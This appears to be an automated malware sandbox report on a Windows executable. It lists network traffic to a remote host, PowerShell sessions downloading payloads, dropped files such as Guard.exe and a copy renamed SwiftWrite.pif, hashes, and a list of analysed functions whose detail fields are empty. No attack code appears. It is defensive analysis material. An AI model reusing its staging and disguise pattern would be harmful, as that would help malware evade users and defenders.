| Dec 27, 2024 15:00:56.763194084 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.767695904 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.767712116 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.767769098 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.767777920 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.767815113 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.774772882 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.774791002 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.774864912 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.774890900 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.774909019 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.774930954 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.779118061 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.779136896 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.779186010 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.779191971 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.779232025 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.779248953 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.783710003 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.783726931 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.783780098 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.783787966 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.783811092 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.783832073 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.790815115 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.790831089 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.790888071 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.790895939 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.790905952 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.790939093 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.795639038 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.795674086 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.795723915 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.795731068 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.795775890 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.795775890 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.800256968 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.800272942 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.800332069 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.800339937 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.800378084 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.955260038 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.955281019 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.955488920 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.955488920 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.955559969 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.955621958 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.960500956 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.960516930 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.960562944 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.960571051 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.960597992 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.960711002 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.965379953 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.965398073 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.965466022 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.965473890 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.965517044 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.970882893 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.970899105 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.970963955 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.970972061 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.970995903 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.971005917 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.977668047 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.977686882 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.977732897 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.977741003 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.977751017 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.977792978 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.982706070 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.982722998 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.982799053 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.982808113 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.982846975 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.988486052 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.988501072 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.988579988 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.988588095 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.988627911 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.993247032 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.993263006 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.993321896 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:56.993331909 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:56.993371964 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.147926092 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.147953987 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.148067951 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.148102999 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.148147106 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.152764082 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.152784109 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.152839899 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.152863979 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.152904034 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.157623053 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.157640934 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.157706976 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.157727957 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.157831907 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.158464909 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.158538103 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.158546925 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:57.158596992 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:57.159010887 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 27, 2024 15:00:47.610130072 CET | 56729 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 27, 2024 15:00:47.918257952 CET | 53 | 56729 | 1.1.1.1 | 192.168.2.9 |
| Dec 27, 2024 15:00:59.287691116 CET | 56855 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 27, 2024 15:00:59.518891096 CET | 53 | 56855 | 1.1.1.1 | 192.168.2.9 |
| Dec 27, 2024 15:01:15.090598106 CET | 58499 | 53 | 192.168.2.9 | 1.1.1.1 |
| Dec 27, 2024 15:01:15.429806948 CET | 53 | 58499 | 1.1.1.1 | 192.168.2.9 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 15:00:47.610130072 CET | 192.168.2.9 | 1.1.1.1 | 0x36a9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 27, 2024 15:00:59.287691116 CET | 192.168.2.9 | 1.1.1.1 | 0xc0ea | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 27, 2024 15:01:15.090598106 CET | 192.168.2.9 | 1.1.1.1 | 0x789f | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 15:00:47.918257952 CET | 1.1.1.1 | 192.168.2.9 | 0x36a9 | No error (0) | 147.45.49.155 | A (IP address) | IN (0x0001) | false | ||
| Dec 27, 2024 15:00:59.518891096 CET | 1.1.1.1 | 192.168.2.9 | 0xc0ea | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
| Dec 27, 2024 15:01:15.429806948 CET | 1.1.1.1 | 192.168.2.9 | 0x789f | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.9 | 49707 | 147.45.49.155 | 443 | 1004 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-27 14:00:49 UTC | 170 | OUT | |
| 2024-12-27 14:00:50 UTC | 397 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN | |
| 2024-12-27 14:00:50 UTC | 16384 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.9 | 49723 | 147.45.49.155 | 443 | 6848 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| 2024-12-27 14:00:54 UTC | 82 | OUT | |
| 2024-12-27 14:00:55 UTC | 425 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN | |
| 2024-12-27 14:00:55 UTC | 16384 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 0 |
| Start time: | 09:00:43 |
| Start date: | 27/12/2024 |
| Path: | C:\Users\user\Desktop\TCKxnQ5CPn.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff69db30000 |
| File size: | 1'083'904 bytes |
| MD5 hash: | 2A89603D2620B2A62113513709E38E95 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | low |
| Has exited: | true |
| Target ID: | 2 |
| Start time: | 09:00:43 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff760310000 |
| File size: | 452'608 bytes |
| MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 3 |
| Start time: | 09:00:43 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff70f010000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 4 |
| Start time: | 09:00:50 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff760310000 |
| File size: | 452'608 bytes |
| MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 5 |
| Start time: | 09:00:50 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff70f010000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 6 |
| Start time: | 09:00:55 |
| Start date: | 27/12/2024 |
| Path: | C:\Users\Public\Guard.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x130000 |
| File size: | 893'608 bytes |
| MD5 hash: | 18CE19B57F43CE0A5AF149C96AECC685 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Antivirus matches: |
|
| Reputation: | moderate |
| Has exited: | false |
| Target ID: | 7 |
| Start time: | 09:00:57 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xc50000 |
| File size: | 236'544 bytes |
| MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 8 |
| Start time: | 09:00:57 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff70f010000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 12 |
| Start time: | 09:01:07 |
| Start date: | 27/12/2024 |
| Path: | C:\Windows\System32\wscript.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff75ab80000 |
| File size: | 170'496 bytes |
| MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 13 |
| Start time: | 09:01:08 |
| Start date: | 27/12/2024 |
| Path: | C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x8c0000 |
| File size: | 893'608 bytes |
| MD5 hash: | 18CE19B57F43CE0A5AF149C96AECC685 |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Antivirus matches: |
|
| Has exited: | false |
Execution Graph
| Execution Coverage: | 2.5% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 10.3% |
| Total number of Nodes: | 1520 |
| Total number of Limit Nodes: | 44 |
Graph
Function 00007FF69DB337B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB36580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB51D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBCF630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBAC7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB37920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB35DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB33D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB4E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB33B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB425BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB33CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB37EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB372C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB33F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB54610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB466C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBC56A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBE17C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDCE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDBA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDDB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBC32AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB3183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
